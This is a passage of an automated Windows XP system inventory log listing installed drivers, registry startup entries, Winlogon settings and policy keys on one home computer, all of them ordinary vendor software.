(AegisP) AEGIS Protocol (IEEE 802.1x) v3.6.0.0 [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\AegisP.sys -> Meetinghouse Data Communications [Ver = 3.6.0.0 | Size = 21425 bytes | Modified Date = 9/24/2007 9:24:23 AM | Attr =    ]
(AliIde) AliIde [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\aliide.sys -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 12:51:56 PM | Attr =    ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp.080413-2111) | Size = 43008 bytes | Modified Date = 4/13/2008 11:36:39 AM | Attr =    ]
(APPDRV) APPDRV [Kernel | System | Running] -> %SystemRoot%\system32\drivers\APPDRV.SYS -> Dell Inc [Ver = 1, 0, 1, 1 | Size = 16128 bytes | Modified Date = 8/12/2005 4:50:46 PM | Attr =    ]
(asc) asc [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\asc.sys -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 12:52:00 PM | Attr =    ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\asc3550.sys -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 12:51:58 PM | Attr =    ]
(aswFsBlk) aswFsBlk [File_System | Auto | Running] -> %SystemRoot%\system32\drivers\aswFsBlk.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 20560 bytes | Modified Date = 7/19/2008 7:37:42 AM | Attr =    ]
(aswMon2) avast! Standard Shield Support [File_System | Auto | Running] -> %SystemRoot%\System32\drivers\aswmon2.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 94416 bytes | Modified Date = 7/19/2008 7:37:21 AM | Attr =    ]
(aswRdr) aswRdr [Kernel | On_Demand | Running] -> %SystemRoot%\System32\drivers\aswRdr.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 23152 bytes | Modified Date = 7/19/2008 7:33:42 AM | Attr =    ]
(aswSP) avast! Self Protection [Kernel | System | Running] -> %SystemRoot%\System32\drivers\aswSP.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 78416 bytes | Modified Date = 7/19/2008 7:35:18 AM | Attr =    ]
(aswTdi) avast! Network Shield Support [Kernel | System | Running] -> %SystemRoot%\System32\drivers\aswTdi.sys -> ALWIL Software [Ver = 4.8.1227.0 | Size = 42912 bytes | Modified Date = 7/19/2008 7:32:36 AM | Attr =    ]
(bcm4sbxp) Broadcom 440x 10/100 Integrated Controller XP Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\bcm4sbxp.sys -> Broadcom Corporation [Ver = 4.52.0.0 built by: WinDDK | Size = 44544 bytes | Modified Date = 8/25/2006 6:23:08 AM | Attr =    ]
(brfilt) Brother MFC Filter Driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\BrFilt.sys -> Brother Industries Ltd. [Ver = 1.0.0.0 (Lab06_N.010129-0357) | Size = 2944 bytes | Modified Date = 8/17/2001 11:12:12 AM | Attr =    ]
(BrSerWDM) Brother Serial driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\BrSerWdm.sys -> Brother Industries Ltd. [Ver = 1.0.0.15 (Lab06_N.010129-0357) | Size = 60416 bytes | Modified Date = 8/17/2001 11:12:20 AM | Attr =    ]
(BrUsbMdm) Brother MFC USB Fax Only Modem [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\BrUsbMdm.sys -> Brother Industries Ltd. [Ver = 1,0,0,7 (Lab06_N.010129-0357) | Size = 11008 bytes | Modified Date = 8/17/2001 11:12:20 AM | Attr =    ]
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\cmdide.sys -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 12:51:54 PM | Attr =    ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dac2w2k.sys -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 12:52:16 PM | Attr =    ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 799744 bytes | Modified Date = 4/13/2008 11:44:48 AM | Attr =    ]
(dmio) Logical Disk Manager Driver [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 153344 bytes | Modified Date = 4/13/2008 11:44:46 AM | Attr =    ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dmload.sys -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/10/2004 4:00:00 AM | Attr =    ]
(drvmcdb) drvmcdb [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\drvmcdb.sys -> Sonic Solutions [Ver = 3.22.03a | Size = 87488 bytes | Modified Date = 12/1/2004 2:22:00 AM | Attr =    ]
(drvnddm) drvnddm [File_System | Auto | Running] -> %SystemRoot%\system32\drivers\drvnddm.sys -> Sonic Solutions [Ver = 2.56.43a | Size = 40480 bytes | Modified Date = 11/23/2004 1:56:00 AM | Attr =    ]
(DSproct) DSproct [Kernel | On_Demand | Stopped] -> %ProgramFiles%\Dell Support\GTAction\triggers\DSproct.sys -> GTek Technologies Ltd. [Ver = 1, 0, 0, 28 | Size = 4864 bytes | Modified Date = 1/10/2006 10:07:58 AM | Attr =    ]
(E100B) Intel(R) PRO Adapter Driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\e100b325.sys -> Intel Corporation [Ver = 5.41.22.0000 built by: WinDDK | Size = 117760 bytes | Modified Date = 8/17/2001 11:12:10 AM | Attr =    ]
(HDAudBus) Microsoft UAA Bus Driver for High Definition Audio [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\hdaudbus.sys -> Windows (R) Server 2003 DDK provider [Ver = 5.10.01.5013 built by: WinDDK | Size = 144384 bytes | Modified Date = 4/13/2008 9:36:05 AM | Attr =    ]
(HSF_DPV) HSF_DPV [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HSX_DPV.sys -> Conexant Systems, Inc. [Ver = 7.38.00 built by: WinDDK | Size = 936960 bytes | Modified Date = 12/1/2005 6:40:56 AM | Attr =    ]
(HSXHWAZL) HSXHWAZL [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HSXHWAZL.sys -> Conexant Systems, Inc. [Ver = 7.38.00 built by: WinDDK | Size = 192512 bytes | Modified Date = 12/1/2005 6:40:12 AM | Attr =    ]
(ialm) ialm [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\ialmnt5.sys -> Intel Corporation [Ver = 6.14.10.4446 | Size = 1364574 bytes | Modified Date = 12/13/2005 9:09:34 AM | Attr =    ]
(mdmxsdk) mdmxsdk [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\mdmxsdk.sys -> Conexant [Ver = 1.0.2.010 | Size = 12544 bytes | Modified Date = 10/5/2005 3:57:08 AM | Attr =    ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\mraid35x.sys -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 12:52:12 PM | Attr =    ]
(NETw3x32) Intel(R) PRO/Wireless 3945ABG Adapter Driver for Windows XP 32 Bit [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\NETw3x32.sys -> Intel® Corporation [Ver = 10, 5, 1, 72 | Size = 1711104 bytes | Modified Date = 10/17/2006 11:55:28 AM | Attr =    ]
(nv) nv [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.5673 | Size = 1897408 bytes | Modified Date = 8/3/2004 9:29:56 PM | Attr =    ]
(omci) OMCI WDM Device Driver [Kernel | System | Running] -> %SystemRoot%\system32\drivers\omci.sys -> Dell Inc [Ver = 7, 1, 382, 0 | Size = 17153 bytes | Modified Date = 2/13/2004 3:46:00 PM | Attr =    ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\ptilink.sys -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/10/2004 4:00:00 AM | Attr =    ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\pxhelp20.sys -> Sonic Solutions [Ver = 3.00.43J | Size = 36624 bytes | Modified Date = 10/18/2006 4:00:00 AM | Attr =    ]
(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql1080.sys -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 12:52:20 PM | Attr =    ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql12160.sys -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 12:52:20 PM | Attr =    ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql1280.sys -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 12:52:18 PM | Attr =    ]
(rimmptsk) rimmptsk [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\rimmptsk.sys -> REDC [Ver = 1.0.0.6 | Size = 28544 bytes | Modified Date = 7/14/2005 10:58:14 PM | Attr =    ]
(rimsptsk) rimsptsk [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\rimsptsk.sys -> REDC [Ver = 1.00.01.12 | Size = 51328 bytes | Modified Date = 7/12/2005 11:00:30 PM | Attr =    ]
(rismxdp) Ricoh xD-Picture Card Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\rixdptsk.sys -> REDC [Ver = 1.00.02.04 | Size = 307968 bytes | Modified Date = 7/14/2005 9:28:38 PM | Attr =    ]
(s24trans) WLAN Transport [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\s24trans.sys -> Intel Corporation [Ver = 10.5.1.0   | Size = 12544 bytes | Modified Date = 10/19/2006 9:29:22 AM | Attr =    ]
(Secdrv) Secdrv [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\secdrv.sys -> Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K. [Ver = 4.03.086 | Size = 20480 bytes | Modified Date = 11/13/2007 3:25:53 AM | Attr =    ]
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp.080413-2111) | Size = 40960 bytes | Modified Date = 4/13/2008 11:36:39 AM | Attr =    ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sparrow.sys -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 1:07:44 PM | Attr =    ]
(sptd) sptd [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\sptd.sys ->  [Ver =  | Size = 639224 bytes | Modified Date = 10/31/2007 7:30:50 PM | Attr =    ]
(sscdbhk5) sscdbhk5 [File_System | System | Running] -> %SystemRoot%\system32\drivers\sscdbhk5.sys -> Sonic Solutions [Ver = 1.10.87a | Size = 5627 bytes | Modified Date = 7/14/2004 10:29:04 AM | Attr =    ]
(ssrtln) ssrtln [File_System | System | Running] -> %SystemRoot%\system32\drivers\ssrtln.sys -> Sonic Solutions [Ver = 1.10.87a | Size = 23545 bytes | Modified Date = 7/14/2004 10:28:50 AM | Attr =    ]
(STHDA) SigmaTel High Definition Audio CODEC [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\sthda.sys -> SigmaTel, Inc. [Ver = 5.10.4995.1  nd446 cp1 | Size = 1156648 bytes | Modified Date = 3/24/2006 10:34:30 PM | Attr =    ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\symc810.sys -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 1:07:34 PM | Attr =    ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\symc8xx.sys -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 1:07:36 PM | Attr =    ]
(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sym_hi.sys -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 1:07:40 PM | Attr =    ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sym_u3.sys -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 1:07:42 PM | Attr =    ]
(SynTP) Synaptics TouchPad Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\SynTP.sys -> Synaptics, Inc. [Ver = 8.2.4.6 08Mar06 | Size = 191872 bytes | Modified Date = 3/8/2006 5:35:10 PM | Attr =    ]
(tfsnboio) tfsnboio [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnboio.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 25883 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsncofs) tfsncofs [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsncofs.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 34843 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsndrct) tfsndrct [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsndrct.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 4123 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsndres) tfsndres [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsndres.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 2239 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsnifs) tfsnifs [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnifs.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 86586 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsnopio) tfsnopio [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnopio.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 15227 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsnpool) tfsnpool [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnpool.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 6363 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsnudf) tfsnudf [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnudf.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 98714 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(tfsnudfa) tfsnudfa [File_System | Auto | Running] -> %SystemRoot%\system32\dla\tfsnudfa.sys -> Sonic Solutions [Ver = 1.04.08a | Size = 100603 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ultra.sys -> Promise Technology, Inc. [Ver =  1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 12:52:22 PM | Attr =    ]
(w39n51) Intel(R) PRO/Wireless 3945ABG Adapter Driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\w39n51.sys -> Intel® Corporation [Ver = 10, 1, 1, 7 | Size = 1429632 bytes | Modified Date = 4/26/2006 10:13:04 PM | Attr =    ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\wanatw4.sys -> America Online, Inc. [Ver = 8.3.0.0 | Size = 33588 bytes | Modified Date = 1/10/2003 3:13:04 PM | Attr =    ]
(winachsf) winachsf [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HSX_CNXT.sys -> Conexant Systems, Inc. [Ver = 7.38.00 built by: WinDDK | Size = 669696 bytes | Modified Date = 12/1/2005 6:40:08 AM | Attr =    ]
(ATWPKT2) ATWPKT2 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\atwpkt2.sys -> America Online [Ver = 4.8.8.4                                | Size = 24960 bytes | Modified Date = 10/11/2007 4:20:56 AM | Attr =    ]

[Registry - Non-Microsoft Only]
< Run [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> 
Adobe Photo Downloader -> %ProgramFiles%\Adobe\Photoshop Elements 4.0\apdproxy.exe ["C:\Program Files\Adobe\Photoshop Elements 4.0\apdproxy.exe"] -> Adobe Systems Incorporated [Ver = 3.0.0.53237 | Size = 57344 bytes | Modified Date = 9/16/2005 2:37:04 AM | Attr =    ]
Adobe Reader Speed Launcher -> %ProgramFiles%\Adobe\Reader 8.0\Reader\reader_sl.exe ["C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"] -> Adobe Systems Incorporated [Ver = 8.0.0.0 | Size = 39792 bytes | Modified Date = 1/11/2008 11:16:38 PM | Attr =    ]
AOLDialer -> %CommonProgramFiles%\AOL\ACS\AOLDial.exe [C:\Program Files\Common Files\AOL\ACS\AOLDial.exe] -> AOL LLC [Ver = 4.6.1.2               | Size = 71216 bytes | Modified Date = 10/23/2006 5:50:37 AM | Attr = R  ]
avast! -> %ProgramFiles%\Alwil Software\Avast4\ashDisp.exe [C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe] -> ALWIL Software [Ver = 4, 8, 1227, 0 | Size = 78008 bytes | Modified Date = 7/19/2008 7:38:34 AM | Attr =    ]
Dell QuickSet -> %ProgramFiles%\Dell\QuickSet\quickset.exe [C:\Program Files\Dell\QuickSet\quickset.exe] -> Dell Inc [Ver = 7, 1, 12, 0 | Size = 1032192 bytes | Modified Date = 8/3/2006 5:51:42 PM | Attr =    ]
dla -> %SystemRoot%\system32\dla\tfswctrl.exe [C:\WINDOWS\system32\dla\tfswctrl.exe] -> Sonic Solutions [Ver = 1.04.08a | Size = 127035 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
EEventManager -> %ProgramFiles%\epson\Creativity Suite\Event Manager\EEventManager.exe [C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe] -> SEIKO EPSON CORPORATION [Ver = 1, 8, 0, 0 | Size = 102400 bytes | Modified Date = 10/12/2006 4:57:08 PM | Attr =    ]
HostManager -> %CommonProgramFiles%\AOL\1211604845\ee\aolsoftware.exe [C:\Program Files\Common Files\AOL\1211604845\ee\AOLSoftware.exe] -> AOL LLC [Ver = 15.5.1.2 | Size = 42032 bytes | Modified Date = 5/25/2007 10:16:08 AM | Attr =    ]
igfxhkcmd -> %SystemRoot%\system32\hkcmd.exe [C:\WINDOWS\system32\hkcmd.exe] -> Intel Corporation [Ver = 3.0.0.4446 | Size = 77824 bytes | Modified Date = 12/13/2005 8:41:08 AM | Attr =    ]
igfxpers -> %SystemRoot%\system32\igfxpers.exe [C:\WINDOWS\system32\igfxpers.exe] -> Intel Corporation [Ver = 3.0.0.4446 | Size = 118784 bytes | Modified Date = 12/13/2005 8:45:00 AM | Attr =    ]
igfxtray -> %SystemRoot%\system32\igfxtray.exe [C:\WINDOWS\system32\igfxtray.exe] -> Intel Corporation [Ver = 3.0.0.4446 | Size = 98304 bytes | Modified Date = 12/13/2005 8:44:18 AM | Attr =    ]
IntelWireless -> %ProgramFiles%\Intel\Wireless\Bin\iFrmewrk.exe ["C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless] -> Intel Corporation [Ver = 10.5.1.18 | Size = 696320 bytes | Modified Date = 10/18/2006 5:58:16 PM | Attr =    ]
IntelZeroConfig -> %ProgramFiles%\Intel\Wireless\Bin\ZCfgSvc.exe ["C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe"] -> Intel Corporation [Ver = 10.5.1.9 | Size = 802816 bytes | Modified Date = 10/18/2006 6:04:28 PM | Attr =    ]
ISUSPM Startup -> %CommonProgramFiles%\InstallShield\UpdateService\ISUSPM.exe [C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup] -> InstallShield Software Corporation [Ver = 3, 10, 100, 1155 | Size = 221184 bytes | Modified Date = 7/27/2004 3:50:42 PM | Attr =    ]
ISUSScheduler -> %CommonProgramFiles%\InstallShield\UpdateService\issch.exe ["C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start] -> InstallShield Software Corporation [Ver = 3, 10, 100, 1155 | Size = 81920 bytes | Modified Date = 7/27/2004 3:50:18 PM | Attr =    ]
PCMService -> %ProgramFiles%\Dell\MediaDirect\PCMService.exe ["C:\Program Files\Dell\MediaDirect\PCMService.exe"] -> CyberLink Corp. [Ver = 4, 5, 0, 0 | Size = 184320 bytes | Modified Date = 5/2/2007 6:16:54 PM | Attr =    ]
QuickTime Task -> %ProgramFiles%\QuickTime\qttask.exe ["C:\Program Files\QuickTime\qttask.exe" -atboottime] -> Apple Computer, Inc. [Ver = 6.5 | Size = 98304 bytes | Modified Date = 11/28/2006 1:10:00 PM | Attr =    ]
SigmatelSysTrayApp -> %SystemRoot%\stsystra.exe [stsystra.exe] -> SigmaTel, Inc. [Ver = 1.0.4995.1  nd446 cp1 | Size = 282624 bytes | Modified Date = 3/24/2006 10:30:44 PM | Attr =    ]
SynTPEnh -> %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe [C:\Program Files\Synaptics\SynTP\SynTPEnh.exe] -> Synaptics, Inc. [Ver = 8.2.4.6 08Mar06 | Size = 761947 bytes | Modified Date = 3/8/2006 5:48:02 PM | Attr =    ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe ["C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot] -> RealNetworks, Inc. [Ver = 0.1.0.4043 | Size = 185632 bytes | Modified Date = 9/13/2007 5:20:20 PM | Attr =    ]
< OptionalComponents [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\ -> 
IMAIL-> Installed = 1 -> 
MAPI-> Installed = 1 -> 
MSFS-> Installed = 1 -> 
< Run [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> 
ModemOnHold -> %ProgramFiles%\NetWaiting\netwaiting.exe [C:\Program Files\NetWaiting\netWaiting.exe] ->  [Ver =  | Size = 20480 bytes | Modified Date = 9/10/2003 1:24:00 AM | Attr =    ]
swg -> %ProgramFiles%\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe] -> Google Inc. [Ver = 2, 0, 301, 1654 | Size = 68856 bytes | Modified Date = 4/10/2007 8:01:36 PM | Attr =    ]
< All Users Startup Folder > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> 
%AllUsersProfile%\Start Menu\Programs\Startup\Digital Line Detect.lnk -> %ProgramFiles%\Digital Line Detect\DLG.exe -> BVRP Software [Ver = 1, 0, 0, 1 | Size = 24576 bytes | Modified Date = 10/29/2003 1:06:00 AM | Attr =    ]
%AllUsersProfile%\Start Menu\Programs\Startup\Google Updater.lnk -> %ProgramFiles%\Google\Google Updater\GoogleUpdater.exe -> Google [Ver = 2.2.940.34809.beta | Size = 124912 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
%AllUsersProfile%\Start Menu\Programs\Startup\ymetray.lnk -> %ProgramFiles%\Yahoo!\Yahoo! Music Jukebox\ymetray.exe -> Yahoo! Inc. [Ver = 2.2.2.056 (Build 056) | Size = 54512 bytes | Modified Date = 10/3/2007 2:56:10 PM | Attr =    ]
< Tom Jr Startup Folder > -> C:\Documents and Settings\Tom Jr\Start Menu\Programs\Startup -> 
< SecurityProviders [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders -> 
< Winlogon settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> 
*Shell* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell -> 
Explorer.exe -> %SystemRoot%\explorer.exe -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 1033728 bytes | Modified Date = 4/13/2008 5:12:19 PM | Attr =    ]
*MultiFile Done* -> -> 
*UserInit* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UserInit -> 
C:\WINDOWS\system32\userinit.exe -> %SystemRoot%\system32\userinit.exe -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2113) | Size = 26112 bytes | Modified Date = 4/13/2008 5:12:38 PM | Attr =    ]
*MultiFile Done* -> -> 
*UIHost* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UIHost -> 
logonui.exe -> %SystemRoot%\system32\logonui.exe -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 514560 bytes | Modified Date = 4/13/2008 5:12:24 PM | Attr =    ]
*MultiFile Done* -> -> 
*VMApplet* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\VMApplet -> 
rundll32 shell32 -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
Control_RunDLL "sysdm.cpl" -> %SystemRoot%\system32\sysdm.cpl -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2105) | Size = 300544 bytes | Modified Date = 4/13/2008 5:12:41 PM | Attr =    ]
*MultiFile Done* -> -> 
< Winlogon settings [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> 
< Winlogon\Notify settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ -> 
igfxcui -> %SystemRoot%\system32\igfxdev.dll -> Intel Corporation [Ver = 3.0.0.4446 | Size = 139264 bytes | Modified Date = 12/13/2005 8:40:12 AM | Attr =    ]
< CurrentVersion Policy Settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Attachments\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Attachments\\ScanWithAntiVirus -> 2 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoCDBurning -> 0 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption ->  -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext ->  -> 
